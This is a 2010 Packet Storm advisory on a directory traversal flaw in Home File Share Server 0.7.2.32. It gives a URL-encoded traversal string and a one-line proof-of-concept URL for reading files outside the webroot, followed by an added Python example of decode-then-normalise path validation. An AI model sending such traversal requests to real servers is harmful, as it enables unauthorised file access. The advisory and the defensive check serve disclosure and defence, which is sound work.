Home File Share Server 0.7.2.32 Directory Traversal

2010-11-02T00:00:00
ID PACKETSTORM:95401
Type packetstorm
Reporter AutoSec Tools
Modified 2010-11-02T00:00:00

Description

------------------------------------------------------------------------
Software................Home File Share Server 0.7.2.32
Vulnerability...........Directory Traversal
Download................http://downstairs.dnsalias.net/homefileshareserver.html
Release Date............10/31/2010
Tested On...............Windows XP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://www.johnleitch.net/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------

--Description--

A directory traversal vulnerability in Home File Share Server 0.7.2.32
can be exploited to read files outside of the webroot directory.


--Exploit--

..%2F

The user must be authenticated and the path must begin with a real folder.


--PoC--

http://localhost/RealFolder/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
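
Added example, not part of the original advisory and not the product's code: a server-side path check that decodes the request path before canonicalising it and then confirms the result is still under the webroot, next to a literal "../" filter that the encoded form gets past. The webroot value and the function names are hypothetical, and the product's actual flaw is not documented on this page.

```python
import posixpath
from urllib.parse import unquote

WEBROOT = "/srv/share"  # hypothetical webroot, constructed for this example


def naive_is_safe(raw_path):
    """Flawed check: searches the still-encoded path for a literal "../"."""
    return "../" not in raw_path


def resolve(raw_path, webroot=WEBROOT):
    """Return the canonical path under webroot, or None if the request escapes it."""
    # Decode exactly once, the same number of times the file layer will see.
    decoded = unquote(raw_path)
    # Windows accepts backslash as a separator, so normalise it before checking.
    decoded = decoded.replace("\\", "/")
    if "\x00" in decoded:
        return None
    # Join onto the webroot and collapse "." and ".." components.
    candidate = posixpath.normpath(posixpath.join(webroot, decoded.lstrip("/")))
    # Compare on a component boundary so "/srv/share2" does not pass as "/srv/share".
    if candidate == webroot or candidate.startswith(webroot + "/"):
        return candidate
    return None


if __name__ == "__main__":
    # Request paths constructed for the example; the first is the advisory's PoC path.
    samples = [
        "/RealFolder/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F",
        "/RealFolder/notes.txt",
    ]
    for path in samples:
        print(path, "| naive filter passes:", naive_is_safe(path),
              "| resolved:", resolve(path))
```

The containment check runs on the decoded, normalised path, so a request is judged by where it actually lands rather than by how it is spelled.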